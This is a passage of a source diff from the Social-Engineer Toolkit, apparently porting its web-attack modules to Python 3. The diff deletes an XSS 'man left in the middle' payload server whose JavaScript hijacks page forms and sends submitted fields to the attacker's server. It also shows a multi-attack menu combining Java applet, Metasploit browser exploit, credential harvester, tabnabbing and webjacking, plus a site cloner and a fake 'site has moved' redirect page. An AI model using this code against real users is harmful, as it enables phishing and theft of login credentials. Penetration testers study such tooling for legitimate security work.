"cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print("[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)")
except:
pass

11
src/webattack/java_applet/unsigned.py
View file

@ -4,10 +4,13 @@
#
import subprocess
import os
subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java.class", stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE,
stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java.class", stderr=subprocess.PIPE,
stdout=subprocess.PIPE, shell=True)
subprocess.Popen("javac Java.java", shell=True).wait()
subprocess.Popen("jar cvf Java_Update.jar Java.class", shell=True).wait()
subprocess.Popen("jar ufm Java_Update.jar manifest.mf", shell=True).wait()
subprocess.Popen("cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True)
print "[*] Jar file exported as Java_Update.jar"
subprocess.Popen(
"cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True)
print("[*] Jar file exported as Java_Update.jar")

0
src/webattack/mlitm/__init__.py
View file

222
src/webattack/mlitm/thebiz.py
View file

@ -1,222 +0,0 @@
#!/usr/bin/evn python
# XSS Phishing attack
# Written by Kyle Osborn
# kyle@kyleosborn.com
# GPLv2 License
# Logs data to an XML file. An XML parser will be created soon, or you can do it yourself.
# This is not an exploit tool, it's a payload tool.
# Once you've found the exloit, and you're able to inject javascript,
# just stick this in there as a script.
# <script src="http://YOURIP/">
# Proper HTTP Referers must be sent by the victim. If this is spoofed, or disabled, there will be odd results.
# Requirements - Everything below this line
import urllib2
import BeautifulSoup
import urlparse
import datetime
import re
import sys
from xml.dom import minidom
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from src.core import setcore
# GRAB DEFAULT PORT FOR WEB SERVER
fileopen=file("/etc/setoolkit/set.config" , "r").readlines()
counter=0
for line in fileopen:
line=line.rstrip()
match=re.search("MLITM_PORT=", line)
if match:
port=line.replace("MLITM_PORT=", "")
counter=1
# if nada default port 80
if counter == 0: web_port=8000
# Interface you want to bind to
bind = "0.0.0.0"
# Location of reports
reports = "./reports"
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
if re.search("^https?:\/\/(:?localhost|127)", self.headers["Referer"]) is None:
if self.path == '/':
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
print '[-] Grabbing payload from %s' % self.headers["Referer"]
self.prep_payload()
self.wfile.write(self.send_payload())
print '[-] Exploit sent to %s' % self.client_address[0]
elif self.path[0:11] == '/spacer.gif':
print '[*] Receiving data from %s' % self.client_address[0]
self.referer_host = self.headers["Referer"].replace("https://","").replace("http://","")
self.referer_host = self.referer_host.split("/")[0].split(".")
self.referer_host = self.referer_host[-2]+"."+self.referer_host[-1]
print self.referer_host
self.send_response(200)
self.send_header('Content-Type', 'image/gif')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.end_headers()
self.capture()
else:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
except KeyError:
#self.headers["Referer"] = "http://google.com/"
print '[-] Incoming connection from %s' % self.client_address[0]
print '[!] No referer'
def send_payload(self):
return self.payload
def prep_payload(self):
js_payload = {}
js_payload[0] = """
function func() {
document.getElementsByTagName('body')[0].innerHTML = \""""
js_payload[2] = """\";
var formslength =document.getElementsByTagName('form').length;
for(var i=0; i<formslength; i++){
document.forms[i].setAttribute('onsubmit', 'myOnSubmit('+i+')');
}
}
function myOnSubmit(form) {
data = \"\";
for (i=0; i < document.forms[form].getElementsByTagName(\"input\").length; i++){
data = data+document.forms[form].getElementsByTagName(\"input\")[i].name+\"=\"+document.forms[form].getElementsByTagName(\"input\")[i].value+\"&\";
}
var img = document.createElement('img');
img.src = \""""
js_payload[4] = """?\"+data+\"\";
img.setAttribute('width', '100%');
img.setAttribute('height', '100%');
document.getElementsByTagName('body')[0].appendChild(img);
pause(500);
return true;
}
function pause(milsec){
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < milsec);
}
func();
document.execCommand('Stop');
"""
js_payload[1] = str(self.served())
js_payload[1] = js_payload[1].replace("\"","\\\"")
js_payload[3] = "http://"+self.headers["host"]+"/spacer.gif"
full_payload = ""
js_payload[1] = js_payload[1].replace("\t","").replace("\n","").replace("\r","")
for i in js_payload:
full_payload += str(js_payload[i])
self.payload = full_payload
def served(self):
t = urllib2.urlopen(self.headers["Referer"])
html = t.read()
soup = BeautifulSoup.BeautifulSoup(html)
body = soup.find(["body"])
return body
def capture(self):
self.generated_on = str(datetime.datetime.now())
self.path = self.path.split("?")[1].split(" ")[0]
dict = urlparse.parse_qs(self.path)
meta = {}
meta['ip'] = self.client_address
meta['browser'] = [self.headers["User-Agent"]]
meta['referer'] = [self.headers["Referer"]]
print "[+] Generating XML.."
root = Element('XSS')
root.set('version', '1.0')
request = SubElement(root, 'request')
site = SubElement(request, 'site')
site.text = self.address_string()
date = SubElement(request, 'date')
date.text = self.generated_on
requestLine = SubElement(request, 'requestLine')
requestLine.text = self.requestline
metaData = SubElement(request, 'meta')
for key, value in meta.iteritems():
ele = SubElement(metaData, key)
ele.text = value[0]
formData = SubElement(request, 'formData')
print '[*] Data received:'
for key, value in dict.iteritems():
if key == "":
key = "UNDEFINED"
print '[-] \t '+ str(key)+' => '+str(value)
ele = SubElement(formData, key)
ele.text = value[0]
self.log_data(self.prettify(root))
def prettify(self,elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ElementTree.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
def log_data(self,data):
report = open(reports+"/"+self.referer_host+"_"+self.generated_on.replace(" ","_").replace(":",".")+".xml","w+")
report.write(data)
report.close
print setcore.bcolors.BLUE + "\n***************************************************"
print setcore.bcolors.YELLOW + " Web Server Launched. Welcome to the SET MLTM."
print setcore.bcolors.BLUE + "***************************************************"
print setcore.bcolors.BLUE + "Man Left in the Middle Attack brought to you by:\nKyle Osborn - kyle@kyleosborn.com" + setcore.bcolors.ENDC
print "\nStarting server on %s:%s..." % (bind,port)
try:
serv = HTTPServer((bind, int(port)), RequestHandler)
print setcore.bcolors.GREEN + "[*] Server has started" + setcore.bcolors.ENDC
serv.serve_forever()
except Exception, e:
print e
print "Failed to start webserver.\n\nMake sure you have the permissions to bind on %s:%s" % (bind,port)

289
src/webattack/multi_attack/multiattack.py
View file

@ -19,68 +19,78 @@ me = mod_name()
# vector.
#######################################################
def return_menu():
print_status("Option added. You may select additional vectors")
time.sleep(2)
print("""\nSelect which additional attacks you want to use:\n""")
# option designators needed to ensure its defined ahead of time
java_applet="off"
meta_attack="off"
harvester="off"
tabnabbing="off"
mlitm="off"
webjacking="off"
java_applet = "off"
meta_attack = "off"
harvester = "off"
tabnabbing = "off"
mlitm = "off"
webjacking = "off"
# turning flag on
def flag_on(vector):
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
# turning flag off
def flag_off(vector):
print_info("Turning the %s Attack Vector to " % (vector) + bcolors.RED + "OFF" + bcolors.ENDC)
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.RED + "OFF" + bcolors.ENDC)
# filewriting
def write_file(filename,results):
filewrite=file(setdir + "/%s" % (filename), "w")
def write_file(filename, results):
filewrite = open(setdir + "/%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
# specify attackvector
filewrite=file(setdir + "/attack_vector","w")
filewrite = open(setdir + "/attack_vector", "w")
filewrite.write("multiattack")
filewrite.close()
# on and off switch detection variable
trigger=""
trigger = ""
# set toggle flags here
toggleflag_java=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_meta=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# grab current path
definepath=os.getcwd()
definepath = os.getcwd()
# default flag for webdav to be off
webdav_enable="OFF"
webdav_enable = "OFF"
# see if we are running a custom cloned website
clonedurl = 0
fileopen = file(setdir + "/site.template", "r")
fileopen = open(setdir + "/site.template", "r")
data = fileopen.read()
if "TEMPLATE=SELF" in data:
clonedurl = 1
# clean up cloner directory
if clonedurl == 0:
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("rm -rf %s/web_clone;mkdir %s/web_clone/" % (setdir, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# set a quick loop to see what the user wants
a=1
a = 1
print ("""
[*************************************************************]
@ -97,29 +107,32 @@ print ("""
print("""\nSelect which attacks you want to use:
""")
while a==1:
trigger=""
print " 1. Java Applet Attack Method" + toggleflag_java
print " 2. Metasploit Browser Exploit Method" + toggleflag_meta
print " 3. Credential Harvester Attack Method" + toggleflag_harv
print " 4. Tabnabbing Attack Method" + toggleflag_tabnab
print " 5. Web Jacking Attack Method" + toggleflag_webjacking
print " 6. Use them all - A.K.A. 'Tactical Nuke'"
print " 7. I'm finished and want to proceed with the attack"
print "\n 99. Return to Main Menu\n"
while a == 1:
trigger = ""
print(" 1. Java Applet Attack Method" + toggleflag_java)
print(" 2. Metasploit Browser Exploit Method" + toggleflag_meta)
print(" 3. Credential Harvester Attack Method" + toggleflag_harv)
print(" 4. Tabnabbing Attack Method" + toggleflag_tabnab)
print(" 5. Web Jacking Attack Method" + toggleflag_webjacking)
print(" 6. Use them all - A.K.A. 'Tactical Nuke'")
print(" 7. I'm finished and want to proceed with the attack")
print("\n 99. Return to Main Menu\n")
profile = input(
setprompt(["2", "16"], "Enter selections one at a time (7 to finish)"))
profile=raw_input(setprompt(["2","16"], "Enter selections one at a time (7 to finish)"))
if profile == "": profile = "7"
if profile == "":
profile = "7"
# if the option is something other than 1-7 flag invalid option
# this will make sure its an integer, if not assign an 9 which will trigger invalid option
# this will make sure its an integer, if not assign an 9 which will
# trigger invalid option
try: # this will trigger an error if it isnt an integer
profile=int(profile)
profile = int(profile)
# convert it back
profile=str(profile)
profile = str(profile)
# if it triggers an exception reassign profile to option 8
except: profile = "10"
except:
profile = "10"
# if you want to return to main menu
if profile == "99":
@ -127,7 +140,7 @@ while a==1:
# trigger invalid option
if int(profile) >= 10:
raw_input("\nInvalid option..")
input("\nInvalid option..")
return_continue()
if profile == "6":
@ -135,7 +148,7 @@ while a==1:
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
print bcolors.RED + (r"""
print(bcolors.RED + (r"""
..-^~~~^-..
.~ ~.
(;: :;)
@ -146,13 +159,13 @@ while a==1:
| |
| |
| |
((/ \))""") + bcolors.ENDC
((/ \))""") + bcolors.ENDC)
print "\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?"
print "\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n"
java_applet="on"
meta_attack="on"
harvester="on"
print("\nSelecting everything SET has in its aresenal, you like sending a nuke don't you?")
print("\n[*] Note that tabnabbing is not enabled in the tactical nuke, select manually if you want.\n")
java_applet = "on"
meta_attack = "on"
harvester = "on"
break
if profile == "7":
@ -163,18 +176,18 @@ while a==1:
if java_applet == "off":
flag_on("Java Applet")
return_menu()
java_applet="on"
trigger=1
#toggle_flags here
toggleflag_java=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
java_applet = "on"
trigger = 1
# toggle_flags here
toggleflag_java = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if java_applet == "on":
if trigger != 1:
flag_off("Java Applet")
return_menu()
java_applet="off"
java_applet = "off"
# toggle flags here
toggleflag_java=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# metasploit client_side on/off
if profile == "2":
@ -182,145 +195,151 @@ while a==1:
print_warning("Sorry this option is not available in Windows")
return_continue()
if operating_system != "windows":
if meta_attack=="off":
if meta_attack == "off":
flag_on("Metasploit Client Side")
return_menu()
meta_attack="on"
trigger=1
meta_attack = "on"
trigger = 1
# toggle flags here
toggleflag_meta=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_meta = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if meta_attack=="on":
if meta_attack == "on":
if trigger != 1:
flag_off("Metasploit Client Side")
return_menu()
meta_attack="off"
meta_attack = "off"
# toggle flags here
toggleflag_meta=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_meta = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# harvester on/off
if profile == "3":
if harvester == "off":
flag_on("Harvester")
return_menu()
harvester="on"
trigger=1
harvester = "on"
trigger = 1
# toggle flags here
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if harvester == "on":
if trigger != 1:
flag_off("Harvester")
return_menu()
harvester="off"
harvester = "off"
# toggle flags here
toggleflag_harv=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# if tabnabbing is enabled, no need for harvester to be enabled as well
if profile == "4":
if tabnabbing == "off":
flag_on("Tabnabbing")
return_menu()
tabnabbing="on"
trigger=1
harvester="on"
tabnabbing = "on"
trigger = 1
harvester = "on"
# toggle flags here
toggleflag_tabnab=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if mlitm == "on":
mlitm="off"
toggleflag_mlitm=(bcolors.RED+" (OFF)" + bcolors.ENDC)
print webjacking
mlitm = "off"
toggleflag_mlitm = (bcolors.RED + " (OFF)" + bcolors.ENDC)
print(webjacking)
if webjacking == "on":
webjacking = "off"
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
if tabnabbing == "on":
if trigger != 1:
flag_off("Tabnabbing")
return_menu()
tabnabbing="off"
harvester="off"
tabnabbing = "off"
harvester = "off"
# toggle flags here
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# turn webjacking on
if profile== "5":
if profile == "5":
if webjacking == "off":
flag_on("Web Jacking")
webjacking="on"
webjacking = "on"
return_menu()
trigger=1
trigger = 1
if tabnabbing == "on" or mlitm == "on":
print "[*] You cannot use MLITM and Tabnabbing in the same attack!"
print "[*] Disabling MLITM and/or Tabnabbing"
mlitm="off"
tabnabbing="off"
harvester="on"
print("[*] You cannot use MLITM and Tabnabbing in the same attack!")
print("[*] Disabling MLITM and/or Tabnabbing")
mlitm = "off"
tabnabbing = "off"
harvester = "on"
# toggle flags here
toggleflag_mlitm=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_tabnab=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_mlitm = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_tabnab = (bcolors.RED + " (OFF)" + bcolors.ENDC)
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if harvester == "off":
harvester="on"
toggleflag_harv=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
toggleflag_webjacking=(bcolors.GREEN+" (ON)" + bcolors.ENDC)
harvester = "on"
toggleflag_harv = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.GREEN + " (ON)" + bcolors.ENDC)
if webjacking == "on":
if trigger != 1:
flag_off("Web Jacking")
return_menu()
webjacking="off"
webjacking = "off"
# toggle flags here
toggleflag_webjacking=(bcolors.RED+" (OFF)" + bcolors.ENDC)
toggleflag_webjacking = (bcolors.RED + " (OFF)" + bcolors.ENDC)
# next series of flags needed
payloadgen=0
payloadgen = 0
# write handler files for detection
if java_applet == "on":
write_file("multi_java","multiattack=java_on")
write_file("multi_java", "multiattack=java_on")
if meta_attack == "on":
write_file("multi_meta","multiattack=meta_on")
write_file("multi_meta", "multiattack=meta_on")
if tabnabbing == "on":
write_file("multi_tabnabbing","multiattack=tabnabbing_on")
write_file("multi_tabnabbing", "multiattack=tabnabbing_on")
if harvester == "on":
write_file("multi_harvester","multiattack=harvester_on")
write_file("multi_harvester", "multiattack=harvester_on")
if mlitm == "on":
write_file("multi_mlitm","multiattack=mlitm_on")
write_file("multi_mlitm", "multiattack=mlitm_on")
if webjacking == "on":
write_file("multi_webjacking","multiattack=webjacking_on")
write_file("multi_webjacking", "multiattack=webjacking_on")
# hit cloner flag
# if any of the flags are turned on, then trigger to see if ARP Cache needs to be enabled
if java_applet =="on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# if any of the flags are turned on, then trigger to see if ARP Cache
# needs to be enabled
if java_applet == "on" or meta_attack == "on" or harvester == "on" or tabnabbing == "on" or mlitm == "on":
# web cloner start here
sys.path.append("src/webattack/web_clone")
debug_msg(me,"importing 'src.webattack.web_clone.cloner'",1)
try: reload(cloner)
except: import cloner
debug_msg(me, "importing 'src.webattack.web_clone.cloner'", 1)
try:
reload(cloner)
except:
import cloner
# arp cache attack, will exit quickly
# if not in config file
if operating_system != "windows":
sys.path.append("src/core/arp_cache")
debug_msg(me,"importing 'src.core.arp_cache.arp'",1)
try: reload(arp)
except: import arp
debug_msg(me, "importing 'src.core.arp_cache.arp'", 1)
try:
reload(arp)
except:
import arp
# start the stuff for java applet
if java_applet == "on":
sys.path.append("src/core/payloadgen/")
debug_msg(me,"importing 'src.core.payloadgen.create_payloads'",1)
try: reload(create_payloads)
except: import create_payloads
payloadgen=1
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
reload(create_payloads)
except:
import create_payloads
payloadgen = 1
applet_choice()
# start the stuff for metasploit client side
@ -328,43 +347,51 @@ if meta_attack == "on":
sys.path.append("src/webattack/browser_exploits/")
import gen_payload
# this checks to see if the MSF payload uses webdav, if so we have to force port 80
# this checks to see if the MSF payload uses webdav, if so we have to
# force port 80
if os.path.isfile(setdir + "/webdav_enabled"):
webdav_enabled="on"
webdav_enabled = "on"
# set this incase msf attack, java applet, and harvester is needed
pexpect_flag="off"
pexpect_flag = "off"
# start the stuff for harvester
if harvester == "on" or tabnabbing == "on" or webjacking == "on":
if tabnabbing == "on" or webjacking == "on":
# if tabnabbing is on, set th tabnabbing to on
sys.path.append("src/webattack/tabnabbing")
debug_msg(me,"importing 'src.webattack.tabnabbing.tabnabbing'",1)
try: reload(tabnabbing)
except: import tabnabbing
debug_msg(me, "importing 'src.webattack.tabnabbing.tabnabbing'", 1)
try:
reload(tabnabbing)
except:
import tabnabbing
# if the harvester is on set the multi_harvester flag
sys.path.append("src/webattack/harvester")
if java_applet == "on" or meta_attack == "on":
pexpect_flag="on"
a=subprocess.Popen("python src/webattack/harvester/harvester.py", shell=True)
pexpect_flag = "on"
a = subprocess.Popen(
"python src/webattack/harvester/harvester.py", shell=True)
# start stuff for mlitm
if mlitm == "on":
sys.path.append("src/webattack/mlitm")
if java_applet == "on" or meta_attack == "on":
a=subprocess.Popen("python src/mlitm/mlitm.py")
a = subprocess.Popen("python src/mlitm/mlitm.py")
else:
debug_msg(me,"importing 'src.mlitm.mlitm'",1)
try: reload(mlitm)
except: import mlitm
debug_msg(me, "importing 'src.mlitm.mlitm'", 1)
try:
reload(mlitm)
except:
import mlitm
# start the web server
if java_applet == "on" or meta_attack == "on":
sys.path.append("src/html/")
debug_msg(me,"importing 'src.html.spawn'",1)
try: reload(spawn)
except: import spawn
debug_msg(me, "importing 'src.html.spawn'", 1)
try:
reload(spawn)
except:
import spawn
# if using cred harvester or tabnabbing
if harvester == "on" or tabnabbing == "on":
@ -376,6 +403,6 @@ if java_applet == "on" or meta_attack == "on":
a.terminate()
except AttributeError:
# if it fails pull pid for subprocess thread then terminate it
os.kill( a.pid , signal.SIGTERM)
os.kill(a.pid, signal.SIGTERM)
print_status("\nReport exported.")
return_continue()

1
src/webattack/profiler/webprofiler.py
View file

@ -5,6 +5,7 @@
from src.core.setcore import return_continue, print_info
def prep_website():
print_info("This feature is currently under development and disabled.")
return_continue()

68
src/webattack/tabnabbing/tabnabbing.py
View file

@ -1,7 +1,7 @@
#!/usr/bin/env python
import subprocess
import re
import urllib2
import urllib.request, urllib.error, urllib.parse
import os
from src.core.setcore import *
#
@ -10,66 +10,68 @@ from src.core.setcore import *
#
# pull the timing for SET CONFIG on webjacking
fileopen=file("/etc/setoolkit/set.config", "r")
fileopen = open("/etc/setoolkit/set.config", "r")
for line in fileopen:
match=re.search("WEBJACKING_TIME=", line)
match = re.search("WEBJACKING_TIME=", line)
if match:
line=line.replace("WEBJACKING_TIME=", "")
webjacking_timing=line
line = line.replace("WEBJACKING_TIME=", "")
webjacking_timing = line
# grab attack_vector specification
fileopen=file(setdir + "/attack_vector", "r")
fileopen = open(setdir + "/attack_vector", "r")
for line in fileopen:
attack_vector=line.rstrip()
attack_vector = line.rstrip()
# need to see if we created file to trigger multi attack webjacking
multi_webjacking="off"
multi_webjacking = "off"
if os.path.isfile(setdir + "/multi_webjacking"):
multi_webjacking="on"
multi_webjacking = "on"
# Open the IPADDR file
ipaddr=""
ipaddr = ""
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
# pull URL field so we can pull favicon later on
fileopen=file(setdir + "/site.template","r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
match=re.search("URL=",line)
match = re.search("URL=", line)
if match:
URL=line.replace("URL=", "")
URL = line.replace("URL=", "")
if attack_vector == "tabnabbing":
URL=URL.replace("https://", "")
URL=URL.replace("http://", "")
URL=re.split("/", URL)
URL=URL[0]
URL="http://"+URL
URL = URL.replace("https://", "")
URL = URL.replace("http://", "")
URL = re.split("/", URL)
URL = URL[0]
URL = "http://" + URL
# move cloned site to index2.html
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("mv %s/web_clone/index.html %s/web_clone/index2.html" %
(setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# grab the source and write it out to the cloned directory
fileopen=file("src/webattack/tabnabbing/source.js", "r")
fileopen = open("src/webattack/tabnabbing/source.js", "r")
# write it to dir
filewrite=file(setdir + "/web_clone/source.js", "w")
filewrite = open(setdir + "/web_clone/source.js", "w")
# loop
for line in fileopen:
line=line.rstrip()
match=re.search("URLHERE", line)
line = line.rstrip()
match = re.search("URLHERE", line)
if match:
line=line.replace("URLHERE", URL)
filewrite.write(line+"\n")
line = line.replace("URLHERE", URL)
filewrite.write(line + "\n")
filewrite.close()
if attack_vector == "tabnabbing":
# grab favicon
favicon = urllib2.urlopen("%s/favicon.ico" % (URL))
output = open(setdir + '/web_clone/favicon.ico','wb')
favicon = urllib.request.urlopen("%s/favicon.ico" % (URL))
output = open(setdir + '/web_clone/favicon.ico', 'wb')
output.write(favicon.read())
output.close()
filewrite1=file(setdir + "/web_clone/index.html", "w")
filewrite1.write('<head><script type="text/javascript" src="source.js"></script></head>\n')
filewrite1 = open(setdir + "/web_clone/index.html", "w")
filewrite1.write(
'<head><script type="text/javascript" src="source.js"></script></head>\n')
filewrite1.write("<body>\n")
filewrite1.write("Please wait while the site loads...\n")
filewrite1.write("</body>\n")
@ -77,11 +79,13 @@ if attack_vector == "tabnabbing":
# define webjacking or multi webjacking here
if attack_vector == "webjacking" or multi_webjacking == "on":
filewrite1=file(setdir + "/web_clone/index.html", "w")
filewrite1 = open(setdir + "/web_clone/index.html", "w")
filewrite1.write("<script>\n")
filewrite1.write("function a(){\n")
filewrite1.write('''a= window.open("http://%s/index2.html", "iframe", "");\n''' % (ipaddr));
filewrite1.write(
'''a= window.open("http://%s/index2.html", "iframe", "");\n''' % (ipaddr))
filewrite1.write("}\n")
filewrite1.write("</script>\n")
filewrite1.write('''<a href="%s" onclick="t=setTimeout('a()', %s);" target="iframe"><h1>The site %s has moved, click here to go to the new location.</h1></a>\n''' % (URL,webjacking_timing,URL))
filewrite1.write('''<a href="%s" onclick="t=setTimeout('a()', %s);" target="iframe"><h1>The site %s has moved, click here to go to the new location.</h1></a>\n''' %
(URL, webjacking_timing, URL))
filewrite1.close()

91
src/webattack/web_clone/cloner.py
View file

@ -10,7 +10,7 @@ import sys
import time
import re
import shutil
import urllib
import urllib.request, urllib.parse, urllib.error
operating_system = check_os()
definepath = os.getcwd()
@ -32,7 +32,7 @@ track_email = check_config("TRACK_EMAIL_ADDRESSES=").lower()
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter your IP address: ")
ipaddr = input("Enter your IP address: ")
update_options("IPADDR=" + ipaddr)
# Define base value
@ -48,7 +48,7 @@ if not os.path.isdir(setdir + "/web_clone/"):
# if we used a proxy configuration from the set-proxy
if os.path.isfile(setdir + "/proxy.confg"):
fileopen = file(setdir + "/proxy.config", "r")
fileopen = open(setdir + "/proxy.config", "r")
proxy_config = fileopen.read().rstrip()
# just do a ls
@ -60,7 +60,7 @@ if not os.path.isfile(setdir + "/proxy.confg"):
webdav_meta = 0
# see if exploit requires webdav
try:
fileopen = file(setdir + "/meta_config", "r")
fileopen = open(setdir + "/meta_config", "r")
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
@ -73,7 +73,7 @@ except:
template = ""
# Grab custom or set defined
fileopen = file(setdir + "/site.template", "r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("TEMPLATE=", line)
@ -84,7 +84,7 @@ for line in fileopen:
# grab attack_vector specification
attack_vector = ""
if os.path.isfile(setdir + "/attack_vector"):
fileopen = file(setdir + "/attack_vector", "r").readlines()
fileopen = open(setdir + "/attack_vector", "r").readlines()
for line in fileopen:
attack_vector = line.rstrip()
@ -104,7 +104,7 @@ update_options("APPLET_NAME=" + rand_gen_applet)
try:
# open our config file that was specified in SET
fileopen = file(setdir + "/site.template", "r").readlines()
fileopen = open(setdir + "/site.template", "r").readlines()
# start loop here
url_counter = 0
for line in fileopen:
@ -120,8 +120,8 @@ try:
# if we aren't using multi attack with templates do this
if url != "NULL":
if template != "SET":
print(bcolors.YELLOW + "\n[*] Cloning the website: " + (url))
print("[*] This could take a little bit..." + bcolors.ENDC)
print((bcolors.YELLOW + "\n[*] Cloning the website: " + (url)))
print(("[*] This could take a little bit..." + bcolors.ENDC))
# clone the website
if template != "SELF":
@ -131,20 +131,19 @@ try:
# try except block in case no internet connection, route to Internet,
# etc.
try:
# check if we have wget, if we don't then use urllib2
wget = 0
if os.path.isfile("/usr/local/bin/wget"):
wget = 1
if os.path.isfile("/usr/bin/wget"):
wget = 1
if os.path.isfile("/usr/local/wget"):
wget = 1
# check if we have wget, if we don't then use urllib2 - special thanks to chrismaddalena for the pull request!
# wget is called, but output is sent to devnull to hide "wget:
# missing URL" error
DNULL = open(os.devnull, 'w')
wget = subprocess.call(
'wget', shell=True, stdout=DNULL, stderr=subprocess.STDOUT)
if wget == 1:
subprocess.Popen('%s;cd %s/web_clone/;wget --no-check-certificate -O index.html -c -k -U "%s" "%s";' % (
proxy_config, setdir, user_agent, url), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if wget == 0:
else:
# if we don't have wget installed we will use python to rip,
# not as good as wget
headers = {'User-Agent': user_agent}
@ -157,7 +156,7 @@ try:
# if the site has cloned properly
site_cloned = True
# open file for writing
filewrite = file(setdir + "/web_clone/index.html", "w")
filewrite = open(setdir + "/web_clone/index.html", "w")
# write the data back from the request
filewrite.write(html)
# close the file
@ -169,30 +168,30 @@ try:
# If the website did not clone properly, exit out.
if not os.path.isfile(setdir + "/web_clone/index.html"):
print(
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC)
print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue()
site_cloned = False
# add file to let set interactive shell know it was unsuccessful
filewrite = file(setdir + "/cloner.failed", "w")
filewrite = open(setdir + "/cloner.failed", "w")
filewrite.write("failed")
filewrite.close()
if os.path.isfile(setdir + "/web_clone/index.html"):
